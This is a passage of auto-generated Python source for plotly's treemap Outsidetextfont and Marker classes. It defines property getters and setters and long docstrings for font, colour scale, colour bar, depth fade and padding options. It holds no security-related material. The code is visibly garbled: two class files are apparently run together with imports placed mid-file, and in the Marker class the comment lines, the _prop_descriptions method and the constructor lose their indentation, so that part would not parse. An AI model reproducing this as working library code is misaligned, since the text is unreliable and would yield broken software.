          - An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
          - An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
          - A named CSS color:
                aliceblue, antiquewhite, aqua, aquamarine, azure,
                beige, bisque, black, blanchedalmond, blue,
                blueviolet, brown, burlywood, cadetblue,
                chartreuse, chocolate, coral, cornflowerblue,
                cornsilk, crimson, cyan, darkblue, darkcyan,
                darkgoldenrod, darkgray, darkgrey, darkgreen,
                darkkhaki, darkmagenta, darkolivegreen, darkorange,
                darkorchid, darkred, darksalmon, darkseagreen,
                darkslateblue, darkslategray, darkslategrey,
                darkturquoise, darkviolet, deeppink, deepskyblue,
                dimgray, dimgrey, dodgerblue, firebrick,
                floralwhite, forestgreen, fuchsia, gainsboro,
                ghostwhite, gold, goldenrod, gray, grey, green,
                greenyellow, honeydew, hotpink, indianred, indigo,
                ivory, khaki, lavender, lavenderblush, lawngreen,
                lemonchiffon, lightblue, lightcoral, lightcyan,
                lightgoldenrodyellow, lightgray, lightgrey,
                lightgreen, lightpink, lightsalmon, lightseagreen,
                lightskyblue, lightslategray, lightslategrey,
                lightsteelblue, lightyellow, lime, limegreen,
                linen, magenta, maroon, mediumaquamarine,
                mediumblue, mediumorchid, mediumpurple,
                mediumseagreen, mediumslateblue, mediumspringgreen,
                mediumturquoise, mediumvioletred, midnightblue,
                mintcream, mistyrose, moccasin, navajowhite, navy,
                oldlace, olive, olivedrab, orange, orangered,
                orchid, palegoldenrod, palegreen, paleturquoise,
                palevioletred, papayawhip, peachpuff, peru, pink,
                plum, powderblue, purple, red, rosybrown,
                royalblue, rebeccapurple, saddlebrown, salmon,
                sandybrown, seagreen, seashell, sienna, silver,
                skyblue, slateblue, slategray, slategrey, snow,
                springgreen, steelblue, tan, teal, thistle, tomato,
                turquoise, violet, wheat, white, whitesmoke,
                yellow, yellowgreen
          - A list or array of any of the above

        Returns
        -------
        str|numpy.ndarray
        """
        return self["color"]

    @color.setter
    def color(self, val):
        self["color"] = val

    # colorsrc
    # --------
    @property
    def colorsrc(self):
        """
        Sets the source reference on plot.ly for  color .

        The 'colorsrc' property must be specified as a string or
        as a plotly.grid_objs.Column object

        Returns
        -------
        str
        """
        return self["colorsrc"]

    @colorsrc.setter
    def colorsrc(self, val):
        self["colorsrc"] = val

    # family
    # ------
    @property
    def family(self):
        """
        HTML font family - the typeface that will be applied by the web
        browser. The web browser will only be able to apply a font if
        it is available on the system which it operates. Provide
        multiple font families, separated by commas, to indicate the
        preference in which to apply fonts if they aren't available on
        the system. The plotly service (at https://plot.ly or on-
        premise) generates images on a server, where only a select
        number of fonts are installed and supported. These include
        "Arial", "Balto", "Courier New", "Droid Sans", "Droid Serif",
        "Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
        Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
        Roman".

        The 'family' property is a string and must be specified as:
          - A non-empty string
          - A tuple, list, or one-dimensional numpy array of the above

        Returns
        -------
        str|numpy.ndarray
        """
        return self["family"]

    @family.setter
    def family(self, val):
        self["family"] = val

    # familysrc
    # ---------
    @property
    def familysrc(self):
        """
        Sets the source reference on plot.ly for  family .

        The 'familysrc' property must be specified as a string or
        as a plotly.grid_objs.Column object

        Returns
        -------
        str
        """
        return self["familysrc"]

    @familysrc.setter
    def familysrc(self, val):
        self["familysrc"] = val

    # size
    # ----
    @property
    def size(self):
        """
        The 'size' property is a number and may be specified as:
          - An int or float in the interval [1, inf]
          - A tuple, list, or one-dimensional numpy array of the above

        Returns
        -------
        int|float|numpy.ndarray
        """
        return self["size"]

    @size.setter
    def size(self, val):
        self["size"] = val

    # sizesrc
    # -------
    @property
    def sizesrc(self):
        """
        Sets the source reference on plot.ly for  size .

        The 'sizesrc' property must be specified as a string or
        as a plotly.grid_objs.Column object

        Returns
        -------
        str
        """
        return self["sizesrc"]

    @sizesrc.setter
    def sizesrc(self, val):
        self["sizesrc"] = val

    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        # Dotted path of this object's parent within a figure.
        return "treemap"

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        """Plain-text descriptions of this object's properties."""
        return """\
        color

        colorsrc
            Sets the source reference on plot.ly for  color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for  family .
        size

        sizesrc
            Sets the source reference on plot.ly for  size .
        """

    def __init__(
        self,
        arg=None,
        color=None,
        colorsrc=None,
        family=None,
        familysrc=None,
        size=None,
        sizesrc=None,
        **kwargs
    ):
        """
        Construct a new Outsidetextfont object

        Sets the font used for `textinfo` lying outside the sector.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of
            plotly.graph_objs.treemap.Outsidetextfont
        color

        colorsrc
            Sets the source reference on plot.ly for  color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for  family .
        size

        sizesrc
            Sets the source reference on plot.ly for  size .

        Returns
        -------
        Outsidetextfont
        """
        super(Outsidetextfont, self).__init__("outsidetextfont")
        # Validate arg
        # ------------
        # Copy dict / serialize instance so the caller's object is not
        # mutated by the pops below.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
            )
        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
        # Initialize validators
        # ---------------------
        self._validators["color"] = v_outsidetextfont.ColorValidator()
        self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
        self._validators["family"] = v_outsidetextfont.FamilyValidator()
        self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
        self._validators["size"] = v_outsidetextfont.SizeValidator()
        self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over values in `arg`.
        _v = arg.pop("color", None)
        self["color"] = color if color is not None else _v
        _v = arg.pop("colorsrc", None)
        self["colorsrc"] = colorsrc if colorsrc is not None else _v
        _v = arg.pop("family", None)
        self["family"] = family if family is not None else _v
        _v = arg.pop("familysrc", None)
        self["familysrc"] = familysrc if familysrc is not None else _v
        _v = arg.pop("size", None)
        self["size"] = size if size is not None else _v
        _v = arg.pop("sizesrc", None)
        self["sizesrc"] = sizesrc if sizesrc is not None else _v
        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
# autocolorscale
# --------------
    @property
    def autocolorscale(self):
        """
        Determines whether the colorscale is a default palette
        (`autocolorscale: true`) or the palette determined by
        `marker.colorscale`. Has an effect only if `colors` is set to a
        numerical array. In case `colorscale` is unspecified or
        `autocolorscale` is true, the default palette will be chosen
        according to whether numbers in the `color` array are all
        positive, all negative or mixed.

        The 'autocolorscale' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self["autocolorscale"]

    @autocolorscale.setter
    def autocolorscale(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["autocolorscale"] = val
# cauto
# -----
    @property
    def cauto(self):
        """
        Determines whether or not the color domain is computed with
        respect to the input data (here colors) or the bounds set in
        `marker.cmin` and `marker.cmax`. Has an effect only if `colors`
        is set to a numerical array. Defaults to `false` when
        `marker.cmin` and `marker.cmax` are set by the user.

        The 'cauto' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self["cauto"]

    @cauto.setter
    def cauto(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["cauto"] = val
# cmax
# ----
    @property
    def cmax(self):
        """
        Sets the upper bound of the color domain. Has an effect only if
        `colors` is set to a numerical array. Value should have the same
        units as colors and if set, `marker.cmin` must be set as well.

        The 'cmax' property is a number and may be specified as:
          - An int or float

        Returns
        -------
        int|float
        """
        return self["cmax"]

    @cmax.setter
    def cmax(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["cmax"] = val
# cmid
# ----
    @property
    def cmid(self):
        """
        Sets the mid-point of the color domain by scaling `marker.cmin`
        and/or `marker.cmax` to be equidistant to this point. Has an
        effect only if `colors` is set to a numerical array. Value should
        have the same units as colors. Has no effect when
        `marker.cauto` is `false`.

        The 'cmid' property is a number and may be specified as:
          - An int or float

        Returns
        -------
        int|float
        """
        return self["cmid"]

    @cmid.setter
    def cmid(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["cmid"] = val
# cmin
# ----
    @property
    def cmin(self):
        """
        Sets the lower bound of the color domain. Has an effect only if
        `colors` is set to a numerical array. Value should have the same
        units as colors and if set, `marker.cmax` must be set as well.

        The 'cmin' property is a number and may be specified as:
          - An int or float

        Returns
        -------
        int|float
        """
        return self["cmin"]

    @cmin.setter
    def cmin(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["cmin"] = val
# coloraxis
# ---------
    @property
    def coloraxis(self):
        """
        Sets a reference to a shared color axis. References to these
        shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
        etc. Settings for these shared color axes are set in the
        layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
        Note that multiple color scales can be linked to the same color
        axis.

        The 'coloraxis' property is an identifier of a particular
        subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
        optionally followed by an integer >= 1
        (e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)

        Returns
        -------
        str
        """
        return self["coloraxis"]

    @coloraxis.setter
    def coloraxis(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["coloraxis"] = val
# colorbar
# --------
    @property
    def colorbar(self):
        """
        The 'colorbar' property is an instance of ColorBar
        that may be specified as:
          - An instance of plotly.graph_objs.treemap.marker.ColorBar
          - A dict of string/value properties that will be passed
            to the ColorBar constructor

            Supported dict properties:

                bgcolor
                    Sets the color of padded area.
                bordercolor
                    Sets the axis line color.
                borderwidth
                    Sets the width (in px) of the border enclosing
                    this color bar.
                dtick
                    Sets the step in-between ticks on this axis.
                    Use with `tick0`. Must be a positive number, or
                    special strings available to "log" and "date"
                    axes. If the axis `type` is "log", then ticks
                    are set every 10^(n*dtick) where n is the tick
                    number. For example, to set a tick mark at 1,
                    10, 100, 1000, ... set dtick to 1. To set tick
                    marks at 1, 100, 10000, ... set dtick to 2. To
                    set tick marks at 1, 5, 25, 125, 625, 3125, ...
                    set dtick to log_10(5), or 0.69897000433. "log"
                    has several special values; "L<f>", where `f`
                    is a positive number, gives ticks linearly
                    spaced in value (but not position). For example
                    `tick0` = 0.1, `dtick` = "L0.5" will put ticks
                    at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
                    plus small digits between, use "D1" (all
                    digits) or "D2" (only 2 and 5). `tick0` is
                    ignored for "D1" and "D2". If the axis `type`
                    is "date", then you must convert the time to
                    milliseconds. For example, to set the interval
                    between ticks to one day, set `dtick` to
                    86400000.0. "date" also has special values
                    "M<n>" gives ticks spaced by a number of
                    months. `n` must be a positive integer. To set
                    ticks on the 15th of every third month, set
                    `tick0` to "2000-01-15" and `dtick` to "M3". To
                    set ticks every 4 years, set `dtick` to "M48"
                exponentformat
                    Determines a formatting rule for the tick
                    exponents. For example, consider the number
                    1,000,000,000. If "none", it appears as
                    1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
                    "power", 1x10^9 (with 9 in a super script). If
                    "SI", 1G. If "B", 1B.
                len
                    Sets the length of the color bar This measure
                    excludes the padding of both ends. That is, the
                    color bar length is this length minus the
                    padding on both ends.
                lenmode
                    Determines whether this color bar's length
                    (i.e. the measure in the color variation
                    direction) is set in units of plot "fraction"
                    or in "pixels". Use `len` to set the value.
                nticks
                    Specifies the maximum number of ticks for the
                    particular axis. The actual number of ticks
                    will be chosen automatically to be less than or
                    equal to `nticks`. Has an effect only if
                    `tickmode` is set to "auto".
                outlinecolor
                    Sets the axis line color.
                outlinewidth
                    Sets the width (in px) of the axis line.
                separatethousands
                    If "true", even 4-digit integers are separated
                showexponent
                    If "all", all exponents are shown besides their
                    significands. If "first", only the exponent of
                    the first tick is shown. If "last", only the
                    exponent of the last tick is shown. If "none",
                    no exponents appear.
                showticklabels
                    Determines whether or not the tick labels are
                    drawn.
                showtickprefix
                    If "all", all tick labels are displayed with a
                    prefix. If "first", only the first tick is
                    displayed with a prefix. If "last", only the
                    last tick is displayed with a suffix. If
                    "none", tick prefixes are hidden.
                showticksuffix
                    Same as `showtickprefix` but for tick suffixes.
                thickness
                    Sets the thickness of the color bar This
                    measure excludes the size of the padding, ticks
                    and labels.
                thicknessmode
                    Determines whether this color bar's thickness
                    (i.e. the measure in the constant color
                    direction) is set in units of plot "fraction"
                    or in "pixels". Use `thickness` to set the
                    value.
                tick0
                    Sets the placement of the first tick on this
                    axis. Use with `dtick`. If the axis `type` is
                    "log", then you must take the log of your
                    starting tick (e.g. to set the starting tick to
                    100, set the `tick0` to 2) except when
                    `dtick`=*L<f>* (see `dtick` for more info). If
                    the axis `type` is "date", it should be a date
                    string, like date data. If the axis `type` is
                    "category", it should be a number, using the
                    scale where each category is assigned a serial
                    number from zero in the order it appears.
                tickangle
                    Sets the angle of the tick labels with respect
                    to the horizontal. For example, a `tickangle`
                    of -90 draws the tick labels vertically.
                tickcolor
                    Sets the tick color.
                tickfont
                    Sets the color bar's tick label font
                tickformat
                    Sets the tick label formatting rule using d3
                    formatting mini-languages which are very
                    similar to those in Python. For numbers, see:
                    https://github.com/d3/d3-3.x-api-
                    reference/blob/master/Formatting.md#d3_format
                    And for dates see:
                    https://github.com/d3/d3-3.x-api-
                    reference/blob/master/Time-Formatting.md#format
                    We add one item to d3's date formatter: "%{n}f"
                    for fractional seconds with n digits. For
                    example, *2016-10-13 09:15:23.456* with
                    tickformat "%H~%M~%S.%2f" would display
                    "09~15~23.46"
                tickformatstops
                    A tuple of plotly.graph_objects.treemap.marker.
                    colorbar.Tickformatstop instances or dicts with
                    compatible properties
                tickformatstopdefaults
                    When used in a template (as layout.template.dat
                    a.treemap.marker.colorbar.tickformatstopdefault
                    s), sets the default property values to use for
                    elements of
                    treemap.marker.colorbar.tickformatstops
                ticklen
                    Sets the tick length (in px).
                tickmode
                    Sets the tick mode for this axis. If "auto",
                    the number of ticks is set via `nticks`. If
                    "linear", the placement of the ticks is
                    determined by a starting position `tick0` and a
                    tick step `dtick` ("linear" is the default
                    value if `tick0` and `dtick` are provided). If
                    "array", the placement of the ticks is set via
                    `tickvals` and the tick text is `ticktext`.
                    ("array" is the default value if `tickvals` is
                    provided).
                tickprefix
                    Sets a tick label prefix.
                ticks
                    Determines whether ticks are drawn or not. If
                    "", this axis' ticks are not drawn. If
                    "outside" ("inside"), this axis' are drawn
                    outside (inside) the axis lines.
                ticksuffix
                    Sets a tick label suffix.
                ticktext
                    Sets the text displayed at the ticks position
                    via `tickvals`. Only has an effect if
                    `tickmode` is set to "array". Used with
                    `tickvals`.
                ticktextsrc
                    Sets the source reference on plot.ly for
                    ticktext .
                tickvals
                    Sets the values at which ticks on this axis
                    appear. Only has an effect if `tickmode` is set
                    to "array". Used with `ticktext`.
                tickvalssrc
                    Sets the source reference on plot.ly for
                    tickvals .
                tickwidth
                    Sets the tick width (in px).
                title
                    plotly.graph_objects.treemap.marker.colorbar.Ti
                    tle instance or dict with compatible properties
                titlefont
                    Deprecated: Please use
                    treemap.marker.colorbar.title.font instead.
                    Sets this color bar's title font. Note that the
                    title's font used to be set by the now
                    deprecated `titlefont` attribute.
                titleside
                    Deprecated: Please use
                    treemap.marker.colorbar.title.side instead.
                    Determines the location of color bar's title
                    with respect to the color bar. Note that the
                    title's location used to be set by the now
                    deprecated `titleside` attribute.
                x
                    Sets the x position of the color bar (in plot
                    fraction).
                xanchor
                    Sets this color bar's horizontal position
                    anchor. This anchor binds the `x` position to
                    the "left", "center" or "right" of the color
                    bar.
                xpad
                    Sets the amount of padding (in px) along the x
                    direction.
                y
                    Sets the y position of the color bar (in plot
                    fraction).
                yanchor
                    Sets this color bar's vertical position anchor.
                    This anchor binds the `y` position to the
                    "top", "middle" or "bottom" of the color bar.
                ypad
                    Sets the amount of padding (in px) along the y
                    direction.

        Returns
        -------
        plotly.graph_objs.treemap.marker.ColorBar
        """
        return self["colorbar"]

    @colorbar.setter
    def colorbar(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["colorbar"] = val
# colors
# ------
    @property
    def colors(self):
        """
        Sets the color of each sector of this trace. If not specified,
        the default trace color set is used to pick the sector colors.

        The 'colors' property is an array that may be specified as a tuple,
        list, numpy array, or pandas Series

        Returns
        -------
        numpy.ndarray
        """
        return self["colors"]

    @colors.setter
    def colors(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["colors"] = val
# colorscale
# ----------
    @property
    def colorscale(self):
        """
        Sets the colorscale. Has an effect only if `colors` is set to a
        numerical array. The colorscale must be an array containing
        arrays mapping a normalized value to an rgb, rgba, hex, hsl,
        hsv, or named color string. At minimum, a mapping for the
        lowest (0) and highest (1) values are required. For example,
        `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
        bounds of the colorscale in color space, use`marker.cmin` and
        `marker.cmax`. Alternatively, `colorscale` may be a palette
        name string of the following list: Greys,YlGnBu,Greens,YlOrRd,B
        luered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Blackbod
        y,Earth,Electric,Viridis,Cividis.

        The 'colorscale' property is a colorscale and may be
        specified as:
          - A list of colors that will be spaced evenly to create the colorscale.
            Many predefined colorscale lists are included in the sequential, diverging,
            and cyclical modules in the plotly.colors package.
          - A list of 2-element lists where the first element is the
            normalized color level value (starting at 0 and ending at 1),
            and the second item is a valid color string.
            (e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
          - One of the following named colorscales:
                ['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
                 'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
                 'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
                 'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
                 'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
                 'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
                 'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
                 'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
                 'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
                 'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
                 'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
                 'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
                 'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
                 'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd']

        Returns
        -------
        str
        """
        return self["colorscale"]

    @colorscale.setter
    def colorscale(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["colorscale"] = val
# colorssrc
# ---------
    @property
    def colorssrc(self):
        """
        Sets the source reference on plot.ly for  colors .

        The 'colorssrc' property must be specified as a string or
        as a plotly.grid_objs.Column object

        Returns
        -------
        str
        """
        return self["colorssrc"]

    @colorssrc.setter
    def colorssrc(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["colorssrc"] = val
# depthfade
# ---------
    @property
    def depthfade(self):
        """
        Determines if the sector colors are faded towards the
        background from the leaves up to the headers. This option is
        unavailable when a `colorscale` is present, defaults to false
        when `marker.colors` is set, but otherwise defaults to true.
        When set to "reversed", the fading direction is inverted, that
        is the top elements within hierarchy are drawn with fully
        saturated colors while the leaves are faded towards the
        background color.

        The 'depthfade' property is an enumeration that may be specified as:
          - One of the following enumeration values:
                [True, False, 'reversed']

        Returns
        -------
        Any
        """
        return self["depthfade"]

    @depthfade.setter
    def depthfade(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["depthfade"] = val
# line
# ----
    @property
    def line(self):
        """
        The 'line' property is an instance of Line
        that may be specified as:
          - An instance of plotly.graph_objs.treemap.marker.Line
          - A dict of string/value properties that will be passed
            to the Line constructor

            Supported dict properties:

                color
                    Sets the color of the line enclosing each
                    sector. Defaults to the `paper_bgcolor` value.
                colorsrc
                    Sets the source reference on plot.ly for  color
                    .
                width
                    Sets the width (in px) of the line enclosing
                    each sector.
                widthsrc
                    Sets the source reference on plot.ly for  width
                    .

        Returns
        -------
        plotly.graph_objs.treemap.marker.Line
        """
        return self["line"]

    @line.setter
    def line(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["line"] = val
# pad
# ---
    @property
    def pad(self):
        """
        The 'pad' property is an instance of Pad
        that may be specified as:
          - An instance of plotly.graph_objs.treemap.marker.Pad
          - A dict of string/value properties that will be passed
            to the Pad constructor

            Supported dict properties:

                b
                    Sets the padding from the bottom (in px).
                l
                    Sets the padding from the left (in px).
                r
                    Sets the padding from the right (in px).
                t
                    Sets the padding from the top (in px).

        Returns
        -------
        plotly.graph_objs.treemap.marker.Pad
        """
        return self["pad"]

    @pad.setter
    def pad(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["pad"] = val
# reversescale
# ------------
    @property
    def reversescale(self):
        """
        Reverses the color mapping if true. Has an effect only if
        `colors` is set to a numerical array. If true, `marker.cmin` will
        correspond to the last color in the array and `marker.cmax`
        will correspond to the first color.

        The 'reversescale' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self["reversescale"]

    @reversescale.setter
    def reversescale(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["reversescale"] = val
# showscale
# ---------
    @property
    def showscale(self):
        """
        Determines whether or not a colorbar is displayed for this
        trace. Has an effect only if `colors` is set to a numerical array.

        The 'showscale' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self["showscale"]

    @showscale.setter
    def showscale(self, val):
        # Storage/validation delegated to the base class item-assignment.
        self["showscale"] = val
# property parent name
# --------------------
    @property
    def _parent_path_str(self):
        # Dotted path of this object's parent within a figure; presumably
        # used by the plotly base classes when composing full property
        # paths and error messages.
        return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
coloraxis=None,
colorbar=None,
colors=None,
colorscale=None,
colorssrc=None,
depthfade=None,
line=None,
pad=None,
reversescale=None,
showscale=None,
**kwargs
):
"""
Construct a new Marker object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Marker
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
Returns
-------
Marker
"""
super(Marker, self).__init__("marker")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
